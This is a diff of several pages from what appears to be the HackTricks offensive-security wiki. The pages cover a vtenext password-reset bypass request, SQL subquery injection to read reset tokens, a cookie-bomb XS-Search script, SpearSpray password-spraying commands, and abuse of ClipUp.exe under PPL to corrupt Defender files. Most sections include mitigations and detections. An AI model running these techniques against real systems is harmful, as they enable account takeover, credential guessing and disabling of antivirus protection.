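data = {
    "action": "change_password",
    "user_name": "admin",
    "confirm_new_password": "NewP@ssw0rd!",
    # "__csrf_token": "...",                  # add if the handler enforces it
}
r = requests.post(f"{BASE}/hub/rpwd.php", data=data, timeout=15)
print(r.status_code, len(r.text))
# A 200 followed by a successful login with the new password confirms the issue.
```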
Mitigations:
- Always require a valid, time-bound reset token bound to the account and session before changing a password.
- Never expose skipOldPwdCheck paths to unauthenticated users; enforce authentication for regular password changes and verify the old password.
- Invalidate all active sessions and reset tokens after a password change.
## References
- [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token)
- [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
{{#include ../banners/hacktricks-training.md}}

View File

@ -621,6 +621,37 @@ Or using a **comma bypass**:
This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/](https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/)
### Column/tablename injection in SELECT list via subqueries
If user input is concatenated into the SELECT list or table/column identifiers, prepared statements won't help because bind parameters only protect values, not identifiers. A common vulnerable pattern is:
```php
// Pseudocode
$fieldname = $_REQUEST['fieldname']; // attacker-controlled
$tablename = $modInstance->table_name; // sometimes also attacker-influenced
$q = "SELECT $fieldname FROM $tablename WHERE id=?"; // id is the only bound param
$stmt = $db->pquery($q, [$rec_id]);
```
Exploitation idea: inject a subquery into the field position to exfiltrate arbitrary data:
```sql
-- Legit
SELECT user_name FROM vte_users WHERE id=1;
-- Injected subquery to extract a sensitive value (e.g., password reset token)
SELECT (SELECT token FROM vte_userauthtoken WHERE userid=1) FROM vte_users WHERE id=1;
```
Notes:
- This works even when the WHERE clause uses a bound parameter, because the identifier list is still string-concatenated.
- Some stacks additionally let you control the table name (tablename injection), enabling cross-table reads.
- Output sinks may reflect the selected value into HTML/JSON, allowing XSS or token exfiltration directly from the response.
Mitigations:
- Never concatenate identifiers from user input. Map allowed column names to a fixed allow-list and quote identifiers properly.
- If dynamic table access is required, restrict to a finite set and resolve server-side from a safe mapping.
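A minimal sketch of the allow-list resolution recommended above; the table/column names and the sqlite3 stand-in are purely illustrative:

```python
# Sketch: resolve user-supplied field/table names through a fixed allow-list
# instead of concatenating them into SQL.
import sqlite3  # stand-in for any DB driver

ALLOWED_FIELDS = {"username": "user_name", "email": "email", "phone": "phone_work"}
ALLOWED_TABLES = {"users": "vte_users"}

def fetch_field(conn, table_key: str, field_key: str, rec_id: int):
    try:
        table = ALLOWED_TABLES[table_key]
        column = ALLOWED_FIELDS[field_key]
    except KeyError:
        raise ValueError("unknown table/field requested")
    # identifiers come from the server-side mapping; only the value is bound
    query = f"SELECT {column} FROM {table} WHERE id = ?"
    return conn.execute(query, (rec_id,)).fetchone()

if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE vte_users (id INTEGER, user_name TEXT, email TEXT, phone_work TEXT)")
    conn.execute("INSERT INTO vte_users VALUES (1, 'admin', 'a@b.c', '123')")
    print(fetch_field(conn, "users", "username", 1))
```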
### WAF bypass suggester tools
@ -640,5 +671,8 @@ https://github.com/m4ll0k/Atlas
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt
{{#endref}}
## References
- [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -2,7 +2,24 @@
{{#include ../../banners/hacktricks-training.md}}
This technique combines:
- Cookie bombing: stuffing the victims browser with many/large cookies for the target origin so that subsequent requests hit server/request limits (request header size, URL size in redirects, etc.).
- Error-event oracle: probing a cross-origin endpoint with a <script> (or other subresource) and distinguishing states with onload vs onerror.
High level idea
- Find a target endpoint whose behavior differs for two states you want to test (e.g., search “hit” vs “miss”).
- Ensure the “hit” path will trigger a heavy redirect chain or long URL while the “miss” path stays short. Inflate request headers using many cookies so that only the “hit” path causes the server to fail with an HTTP error (e.g., 431/414/400). The error flips the onerror event and becomes an oracle for XS-Search.
When does this work
- You can cause the victim browser to send cookies to the target (e.g., cookies are SameSite=None or you can set them in a first-party context via a popup window.open).
- There is an app feature you can abuse to set arbitrary cookies (e.g., “save preference” endpoints that turn controlled input names/values into Set-Cookie) or to make post-auth redirects that incorporate attacker-controlled data into the URL.
- The server reacts differently on the two states and, with inflated headers/URL, one state crosses a limit and returns an error response that triggers onerror.
Note on server errors used as the oracle
- 431 Request Header Fields Too Large is commonly returned when cookies inflate request headers; 414 URI Too Long or a server-specific 400 may be returned for long request targets. Any of these result in a failed subresource load and fire onerror. MDN documents 431 and typical causes like excessive cookies (see the References below).
Practical example (angstromCTF 2022)
The following script, taken from [this public writeup](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/), abuses a feature that lets the attacker insert arbitrary cookies, then loads a cross-origin search endpoint as a script. When the query is correct, the server performs a redirect that, together with the cookie bloat, exceeds server limits and returns an error status, so `script.onerror` fires; otherwise nothing happens.
```html
<>'";
@ -59,7 +76,55 @@ The following **script** taken from [**here**](https://blog.huli.tw/2022/05/05/e
</script>
```
Why the popup (window.open)?
- Modern browsers increasingly block third-party cookies. Opening a top-level window to the target makes cookies first-party so Set-Cookie responses from the target will stick, enabling the cookie-bomb step even with third-party cookie restrictions.
Generic probing helper
If you already have a way to set many cookies on the target origin (first-party), you can reuse this minimal oracle against any endpoint whose success/failure leads to different network outcomes (status/MIME/redirect):
```js
function probeError(url) {
return new Promise((resolve) => {
const s = document.createElement('script');
s.src = url;
s.onload = () => resolve(false); // loaded successfully
s.onerror = () => resolve(true); // failed (e.g., 4xx/5xx, wrong MIME, blocked)
document.head.appendChild(s);
});
}
```
Tips to build the oracle
- Force the “positive” state to be heavier: chain an extra redirect only when the predicate is true, or make the redirect URL reflect unbounded user input so it grows with the guessed prefix.
- Inflate headers: repeat cookie bombing until a consistent error is observed on the “heavy” path. Servers commonly cap header size and will fail sooner when many cookies are present.
- Stabilize: fire multiple parallel cookie set operations and probe repeatedly to average out timing and caching noise.
Related XS-Search tricks
- URL length based oracles (no cookies needed) can be combined or used instead when you can force a very long request target:
{{#ref}}
url-max-length-client-side.md
{{#endref}}
Defenses and hardening
- Make success/failure responses indistinguishable:
- Avoid conditional redirects or large differences in response size between states. Return the same status, same content type, and similar body length regardless of state.
- Block cross-site subresource probes:
- SameSite cookies: set sensitive cookies to SameSite=Lax or Strict so subresource requests like <script src> don't carry them; prefer Strict for auth tokens when possible.
- Fetch Metadata: enforce a Resource Isolation Policy to reject cross-site subresource loads (e.g., if Sec-Fetch-Site != same-origin/same-site).
- Cross-Origin-Resource-Policy (CORP): set CORP: same-origin (or at least same-site) for endpoints not meant to be embedded as cross-origin subresources.
- X-Content-Type-Options: nosniff and correct Content-Type on JSON/HTML endpoints to avoid load-as-script quirks.
- Reduce header/URL amplification:
- Cap the number/size of cookies set; sanitize features that turn arbitrary form fields into Set-Cookie.
- Normalize or truncate reflected data in redirects; avoid embedding attacker-controlled long strings in Location URLs.
- Keep server limits consistent and fail uniformly (avoid special error pages only for one branch).
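As a defensive illustration of the Fetch Metadata bullet above, a minimal sketch assuming a Flask backend (route and policy details are examples, not a drop-in rule set):

```python
# Sketch: reject cross-site subresource loads using Fetch Metadata headers.
from flask import Flask, request, abort

app = Flask(__name__)

@app.before_request
def resource_isolation_policy():
    site = request.headers.get("Sec-Fetch-Site")
    # Older browsers omit the header; same-origin/same-site/none (direct navigation) pass.
    if site is None or site in ("same-origin", "same-site", "none"):
        return
    # Allow cross-site top-level navigations, block everything else
    # (e.g., <script src> or <img> probes from another site).
    if request.headers.get("Sec-Fetch-Mode") == "navigate" and request.method == "GET":
        return
    abort(403)

@app.route("/search")
def search():
    return {"results": []}
```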
Notes
- This class of attacks is discussed broadly as “Error Events” XS-Leaks. The cookie-bomb step is just a convenient way to push only one branch over server limits, producing a reliable boolean oracle.
## References
- XS-Leaks: Error Events (onerror/onload as an oracle): https://xsleaks.dev/docs/attacks/error-events/
- MDN: 431 Request Header Fields Too Large (common with many cookies): https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/431
{{#include ../../banners/hacktricks-training.md}}

View File

@ -109,6 +109,81 @@ Invoke-SprayEmptyPassword
legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org
```
### Kerberos pre-auth spraying with LDAP targeting and PSO-aware throttling (SpearSpray)
Kerberos pre-auth-based spraying reduces noise vs SMB/NTLM/LDAP bind attempts and aligns better with AD lockout policies. SpearSpray couples LDAP-driven targeting, a pattern engine, and policy awareness (domain policy + PSOs + badPwdCount buffer) to spray precisely and safely. It can also tag compromised principals in Neo4j for BloodHound pathing.
Key ideas:
- LDAP user discovery with paging and LDAPS support, optionally using custom LDAP filters.
- Domain lockout policy + PSO-aware filtering to leave a configurable attempt buffer (threshold) and avoid locking users.
- Kerberos pre-auth validation using fast gssapi bindings (generates 4768/4771 on DCs instead of 4625).
- Pattern-based, per-user password generation using variables like names and temporal values derived from each user's pwdLastSet.
- Throughput control with threads, jitter, and max requests per second.
- Optional Neo4j integration to mark owned users for BloodHound.
Basic usage and discovery:
```bash
# List available pattern variables
spearspray -l
# Basic run (LDAP bind over TCP/389)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# LDAPS (TCP/636)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl
```
Targeting and pattern control:
```bash
# Custom LDAP filter (e.g., target specific OU/attributes)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
-q "(&(objectCategory=person)(objectClass=user)(department=IT))"
# Use separators/suffixes and an org token consumed by patterns via {separator}/{suffix}/{extra}
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep @-_ -suf !? -x ACME
```
Stealth and safety controls:
```bash
# Control concurrency, add jitter, and cap request rate
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5 -j 3,5 --max-rps 10
# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2
```
Neo4j/BloodHound enrichment:
```bash
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687
```
Pattern system overview (patterns.txt):
```text
# Example templates consuming per-user attributes and temporal context
{name}{separator}{year}{suffix}
{month_en}{separator}{short_year}{suffix}
{season_en}{separator}{year}{suffix}
{samaccountname}
{extra}{separator}{year}{suffix}
```
Available variables include:
- {name}, {samaccountname}
- Temporal from each user's pwdLastSet (or whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Composition helpers and org token: {separator}, {suffix}, {extra}
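To illustrate how such a pattern engine works conceptually (this is a simplified sketch, not SpearSpray's actual implementation), each template can be expanded per user from pwdLastSet-derived values:

```python
# Sketch: expand password patterns per user from pwdLastSet-derived values.
from datetime import datetime

PATTERNS = [
    "{name}{separator}{year}{suffix}",
    "{month_en}{separator}{short_year}{suffix}",
    "{season_en}{separator}{year}{suffix}",
    "{extra}{separator}{year}{suffix}",
]

MONTHS = ["january", "february", "march", "april", "may", "june",
          "july", "august", "september", "october", "november", "december"]

def season_en(month: int) -> str:
    return ["winter", "spring", "summer", "autumn"][(month % 12) // 3]

def candidates(name: str, samaccountname: str, pwd_last_set: datetime,
               separator: str = "@", suffix: str = "!", extra: str = "ACME"):
    ctx = {
        "name": name.capitalize(),
        "samaccountname": samaccountname,
        "year": pwd_last_set.year,
        "short_year": pwd_last_set.strftime("%y"),
        "month_number": f"{pwd_last_set.month:02d}",
        "month_en": MONTHS[pwd_last_set.month - 1].capitalize(),
        "season_en": season_en(pwd_last_set.month).capitalize(),
        "separator": separator,
        "suffix": suffix,
        "extra": extra,
    }
    return [p.format(**ctx) for p in PATTERNS]

print(candidates("maria", "maria.lopez", datetime(2024, 11, 3)))
# ['Maria@2024!', 'November@24!', 'Autumn@2024!', 'ACME@2024!']
```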
Operational notes:
- Favor querying the PDC-emulator with -dc to read the most authoritative badPwdCount and policy-related info.
- badPwdCount resets are triggered on the next attempt after the observation window; use threshold and timing to stay safe.
- Kerberos pre-auth attempts surface as 4768/4771 in DC telemetry; use jitter and rate-limiting to blend in.
> Tip: SpearSpray's default LDAP page size is 200; adjust with -lps as needed.
## Outlook Web Access
There are multiple tools for **password spraying Outlook**.
@ -142,6 +217,11 @@ To use any of these tools, you need a user list and a password / a small list of
## References
- [https://github.com/sikumy/spearspray](https://github.com/sikumy/spearspray)
- [https://github.com/TarlogicSecurity/kerbrute](https://github.com/TarlogicSecurity/kerbrute)
- [https://github.com/Greenwolf/Spray](https://github.com/Greenwolf/Spray)
- [https://github.com/Hackndo/sprayhound](https://github.com/Hackndo/sprayhound)
- [https://github.com/login-securite/conpass](https://github.com/login-securite/conpass)
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)
- [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
- [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296)
@ -149,6 +229,3 @@ To use any of these tools, you need a user list and a password / a small list of
{{#include ../../banners/hacktricks-training.md}}

View File

@ -755,10 +755,89 @@ After replacing the original files and restarting the service stack:
This case study demonstrates how purely client-side trust decisions and simple signature checks can be defeated with a few byte patches.
## Abusing Protected Process Light (PPL) To Tamper AV/EDR With LOLBINs
Protected Process Light (PPL) enforces a signer/level hierarchy so that only equal-or-higher protected processes can tamper with each other. Offensively, if you can legitimately launch a PPL-enabled binary and control its arguments, you can convert benign functionality (e.g., logging) into a constrained, PPL-backed write primitive against protected directories used by AV/EDR.
What makes a process run as PPL
- The target EXE (and any loaded DLLs) must be signed with a PPL-capable EKU.
- The process must be created with CreateProcess using the flags: `EXTENDED_STARTUPINFO_PRESENT | CREATE_PROTECTED_PROCESS`.
- A compatible protection level must be requested that matches the signer of the binary (e.g., `PROTECTION_LEVEL_ANTIMALWARE_LIGHT` for anti-malware signers, `PROTECTION_LEVEL_WINDOWS` for Windows signers). Wrong levels will fail at creation.
See also a broader intro to PP/PPL and LSASS protection here:
{{#ref}}
stealing-credentials/credentials-protections.md
{{#endref}}
Launcher tooling
- Open-source helper: CreateProcessAsPPL (selects protection level and forwards arguments to the target EXE):
- [https://github.com/2x7EQ13/CreateProcessAsPPL](https://github.com/2x7EQ13/CreateProcessAsPPL)
- Usage pattern:
```text
CreateProcessAsPPL.exe <level 0..4> <path-to-ppl-capable-exe> [args...]
# example: spawn a Windows-signed component at PPL level 1 (Windows)
CreateProcessAsPPL.exe 1 C:\Windows\System32\ClipUp.exe <args>
# example: spawn an anti-malware signed component at level 3
CreateProcessAsPPL.exe 3 <anti-malware-signed-exe> <args>
```
LOLBIN primitive: ClipUp.exe
- The signed system binary `C:\Windows\System32\ClipUp.exe` self-spawns and accepts a parameter to write a log file to a caller-specified path.
- When launched as a PPL process, the file write occurs with PPL backing.
- ClipUp cannot parse paths containing spaces; use 8.3 short paths to point into normally protected locations.
8.3 short path helpers
- List short names: `dir /x` in each parent directory.
- Derive short path in cmd: `for %A in ("C:\ProgramData\Microsoft\Windows Defender\Platform") do @echo %~sA`
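You can also resolve 8.3 names programmatically via the Win32 `GetShortPathNameW` API; a small sketch using ctypes (the path is just an example):

```python
# Sketch: resolve an 8.3 short path with GetShortPathNameW (Windows only).
import ctypes
from ctypes import wintypes

def short_path(long_path: str) -> str:
    GetShortPathNameW = ctypes.windll.kernel32.GetShortPathNameW
    GetShortPathNameW.argtypes = [wintypes.LPCWSTR, wintypes.LPWSTR, wintypes.DWORD]
    GetShortPathNameW.restype = wintypes.DWORD
    needed = GetShortPathNameW(long_path, None, 0)   # required buffer size (incl. NUL)
    if needed == 0:
        raise ctypes.WinError()
    buf = ctypes.create_unicode_buffer(needed)
    GetShortPathNameW(long_path, buf, needed)
    return buf.value

print(short_path(r"C:\ProgramData\Microsoft\Windows Defender\Platform"))
```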
Abuse chain (abstract)
1) Launch the PPL-capable LOLBIN (ClipUp) with `CREATE_PROTECTED_PROCESS` using a launcher (e.g., CreateProcessAsPPL).
2) Pass the ClipUp log-path argument to force a file creation in a protected AV directory (e.g., Defender Platform). Use 8.3 short names if needed.
3) If the target binary is normally open/locked by the AV while running (e.g., MsMpEng.exe), schedule the write at boot before the AV starts by installing an auto-start service that reliably runs earlier. Validate boot ordering with Process Monitor (boot logging).
4) On reboot the PPL-backed write happens before the AV locks its binaries, corrupting the target file and preventing startup.
Example invocation (paths redacted/shortened for safety):
```text
# Run ClipUp as PPL at Windows signer level (1) and point its log to a protected folder using 8.3 names
CreateProcessAsPPL.exe 1 C:\Windows\System32\ClipUp.exe -ppl C:\PROGRA~3\MICROS~1\WINDOW~1\Platform\<ver>\samplew.dll
```
Notes and constraints
- You cannot control the contents ClipUp writes beyond placement; the primitive is suited to corruption rather than precise content injection.
- Requires local admin/SYSTEM to install/start a service and a reboot window.
- Timing is critical: the target must not be open; boot-time execution avoids file locks.
Detections
- Process creation of `ClipUp.exe` with unusual arguments, especially parented by non-standard launchers, around boot.
- New services configured to auto-start suspicious binaries and consistently starting before Defender/AV. Investigate service creation/modification prior to Defender startup failures.
- File integrity monitoring on Defender binaries/Platform directories; unexpected file creations/modifications by processes with protected-process flags.
- ETW/EDR telemetry: look for processes created with `CREATE_PROTECTED_PROCESS` and anomalous PPL level usage by non-AV binaries.
### Mitigations
- WDAC/Code Integrity: restrict which signed binaries may run as PPL and under which parents; block ClipUp invocation outside legitimate contexts.
- Service hygiene: restrict creation/modification of auto-start services and monitor start-order manipulation.
- Ensure Defender tamper protection and early-launch protections are enabled; investigate startup errors indicating binary corruption.
- Consider disabling 8.3 short-name generation on volumes hosting security tooling (e.g., `fsutil 8dot3name set C: 1`) if compatible with your environment (test thoroughly).
## References
- [Unit42 New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer](https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/)
- [Synacktiv Should you trust your zero trust? Bypassing Zscaler posture checks](https://www.synacktiv.com/en/publications/should-you-trust-your-zero-trust-bypassing-zscaler-posture-checks.html)
- [Check Point Research Before ToolShell: Exploring Storm-2603s Previous Ransomware Operations](https://research.checkpoint.com/2025/before-toolshell-exploring-storm-2603s-previous-ransomware-operations/)
- [Microsoft Protected Processes](https://learn.microsoft.com/windows/win32/procthread/protected-processes)
- [Microsoft EKU reference (MS-PPSEC)](https://learn.microsoft.com/openspecs/windows_protocols/ms-ppsec/651a90f3-e1f5-4087-8503-40d804429a88)
- [Sysinternals Process Monitor](https://learn.microsoft.com/sysinternals/downloads/procmon)
- [CreateProcessAsPPL launcher](https://github.com/2x7EQ13/CreateProcessAsPPL)
- [Zero Salarium Countering EDRs With The Backing Of Protected Process Light (PPL)](https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html)
{{#include ../banners/hacktricks-training.md}}


@ -38,6 +38,64 @@ This structure is packed into a single byte and determines **who can access whom
- LSASS being PPL does **not prevent credential dumping if you can execute kernel shellcode** or **leverage a high-privileged process with proper access**.
- **Setting or removing PPL** requires a reboot, and when the setting is locked with a **Secure Boot/UEFI variable** it persists even after the registry change is reverted.
### Create a PPL process at launch (documented API)
Windows exposes a documented way to request a Protected Process Light level for a child process during creation using the extended startup attribute list. This does not bypass signing requirements — the target image must be signed for the requested signer class.
Minimal flow in C/C++:
```c
// Request a PPL protection level for the child process at creation time
// Requires Windows 8.1+ and a properly signed image for the selected level
#include <windows.h>
int wmain(int argc, wchar_t **argv) {
STARTUPINFOEXW si = {0};
PROCESS_INFORMATION pi = {0};
si.StartupInfo.cb = sizeof(si);
SIZE_T attrSize = 0;
InitializeProcThreadAttributeList(NULL, 1, 0, &attrSize);
si.lpAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrSize);
if (!si.lpAttributeList) return 1;
if (!InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrSize)) return 1;
DWORD level = PROTECTION_LEVEL_ANTIMALWARE_LIGHT; // or WINDOWS_LIGHT/LSA_LIGHT/WINTCB_LIGHT
if (!UpdateProcThreadAttribute(
si.lpAttributeList, 0,
PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL,
&level, sizeof(level), NULL, NULL)) {
return 1;
}
DWORD flags = EXTENDED_STARTUPINFO_PRESENT | CREATE_PROTECTED_PROCESS; // both flags are required for a PPL child
if (!CreateProcessW(L"C\\Windows\\System32\\notepad.exe", NULL, NULL, NULL, FALSE,
flags, NULL, NULL, &si.StartupInfo, &pi)) {
// If the image isn't signed appropriately for the requested level,
// CreateProcess will fail with ERROR_INVALID_IMAGE_HASH (577).
return 1;
}
// cleanup
DeleteProcThreadAttributeList(si.lpAttributeList);
HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return 0;
}
```
Notes and constraints:
- Use `STARTUPINFOEX` with `InitializeProcThreadAttributeList` and `UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL, ...)`, then pass `EXTENDED_STARTUPINFO_PRESENT | CREATE_PROTECTED_PROCESS` to `CreateProcess*`.
- The protection `DWORD` can be set to constants such as `PROTECTION_LEVEL_WINTCB_LIGHT`, `PROTECTION_LEVEL_WINDOWS`, `PROTECTION_LEVEL_WINDOWS_LIGHT`, `PROTECTION_LEVEL_ANTIMALWARE_LIGHT`, or `PROTECTION_LEVEL_LSA_LIGHT`.
- The child only starts as PPL if its image is signed for that signer class; otherwise process creation fails, commonly with `ERROR_INVALID_IMAGE_HASH (577)` / `STATUS_INVALID_IMAGE_HASH (0xC0000428)`.
- This is not a bypass; it is a supported API intended for appropriately signed images, useful to harden tooling or to validate PPL-protected configurations.
Example CLI using a minimal loader:
- Antimalware signer: `CreateProcessAsPPL.exe 3 C:\Tools\agent.exe --svc`
- LSA-light signer: `CreateProcessAsPPL.exe 4 C:\Windows\System32\notepad.exe` (notepad.exe is Windows-signed, so requesting the LSA class is expected to fail the signer check)
**Options to bypass PPL protections:**
If you want to dump LSASS despite PPL, you have 3 main options:
@ -143,7 +201,12 @@ For more detailed information, consult the official [documentation](https://docs
| Schema Admins | Schema Admins | Schema Admins | Schema Admins |
| Server Operators | Server Operators | Server Operators | Server Operators |
{{#include ../../banners/hacktricks-training.md}}
## References
- [CreateProcessAsPPL minimal PPL process launcher](https://github.com/2x7EQ13/CreateProcessAsPPL)
- [STARTUPINFOEX structure (Win32 API)](https://learn.microsoft.com/en-us/windows/win32/api/winbase/ns-winbase-startupinfoexw)
- [InitializeProcThreadAttributeList (Win32 API)](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-initializeprocthreadattributelist)
- [UpdateProcThreadAttribute (Win32 API)](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-updateprocthreadattribute)
- [LSASS RunAsPPL background and internals](https://itm4n.github.io/lsass-runasppl/)
{{#include ../../banners/hacktricks-training.md}}


@ -106,7 +106,7 @@ int wmain(void) {
STARTUPINFOW si = { .cb = sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
if (CreateProcessWithTokenW(dupToken, LOGON_WITH_PROFILE,
L"C\\\Windows\\\System32\\\cmd.exe", NULL, CREATE_NEW_CONSOLE,
L"C\\\\Windows\\\\System32\\\\cmd.exe", NULL, CREATE_NEW_CONSOLE,
NULL, NULL, &si, &pi)) {
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
@ -159,8 +159,54 @@ int main(void) {
---
## Create child as Protected Process Light (PPL)
Request a PPL protection level for a child at creation time using `STARTUPINFOEX` + `PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL`. This is a documented API and will only succeed if the target image is signed for the requested signer class (Windows/WindowsLight/Antimalware/LSA/WinTcb).
```c
// x86_64-w64-mingw32-gcc -O2 -o spawn_ppl.exe spawn_ppl.c
#include <windows.h>
int wmain(void) {
STARTUPINFOEXW si = {0};
PROCESS_INFORMATION pi = {0};
si.StartupInfo.cb = sizeof(si);
SIZE_T attrSize = 0;
InitializeProcThreadAttributeList(NULL, 1, 0, &attrSize);
si.lpAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrSize);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrSize);
DWORD lvl = PROTECTION_LEVEL_ANTIMALWARE_LIGHT; // choose the desired level
UpdateProcThreadAttribute(si.lpAttributeList, 0,
PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL,
&lvl, sizeof(lvl), NULL, NULL);
if (!CreateProcessW(L"C\\\Windows\\\System32\\\notepad.exe", NULL, NULL, NULL, FALSE,
EXTENDED_STARTUPINFO_PRESENT | CREATE_PROTECTED_PROCESS, NULL, NULL, &si.StartupInfo, &pi)) {
// likely ERROR_INVALID_IMAGE_HASH (577) if the image is not properly signed for that level
return 1;
}
DeleteProcThreadAttributeList(si.lpAttributeList);
HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return 0;
}
```
Levels used most commonly:
- `PROTECTION_LEVEL_WINDOWS_LIGHT` (2)
- `PROTECTION_LEVEL_ANTIMALWARE_LIGHT` (3)
- `PROTECTION_LEVEL_LSA_LIGHT` (4)
Validate the result with Process Explorer/Process Hacker by checking the Protection column.
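Alternatively, the protection level can be queried programmatically; a sketch using `GetProcessInformation` with `ProcessProtectionLevelInfo` (assumes a recent SDK and Windows 8.1+; error handling kept minimal):
```c
// Query the protection level of a process by PID (defaults to the current process)
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int wmain(int argc, wchar_t **argv) {
    DWORD pid = (argc > 1) ? (DWORD)_wtoi(argv[1]) : GetCurrentProcessId();
    HANDLE h = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
    if (!h) { wprintf(L"OpenProcess failed: %lu\n", GetLastError()); return 1; }

    PROCESS_PROTECTION_LEVEL_INFORMATION info = {0};
    if (!GetProcessInformation(h, ProcessProtectionLevelInfo, &info, sizeof(info))) {
        wprintf(L"GetProcessInformation failed: %lu\n", GetLastError());
        CloseHandle(h);
        return 1;
    }
    // PROTECTION_LEVEL_NONE means unprotected; other values map to the PROTECTION_LEVEL_* constants
    wprintf(L"Protection level: 0x%08lX\n", info.ProtectionLevel);
    CloseHandle(h);
    return 0;
}
```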
---
## References
* Ron Bowes “Fodhelper UAC Bypass Deep Dive” (2024)
* SplinterCode “AMSI Bypass 2023: The Smallest Patch Is Still Enough” (BlackHat Asia 2023)
* CreateProcessAsPPL minimal PPL process launcher: https://github.com/2x7EQ13/CreateProcessAsPPL
* Microsoft Docs STARTUPINFOEX / InitializeProcThreadAttributeList / UpdateProcThreadAttribute
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}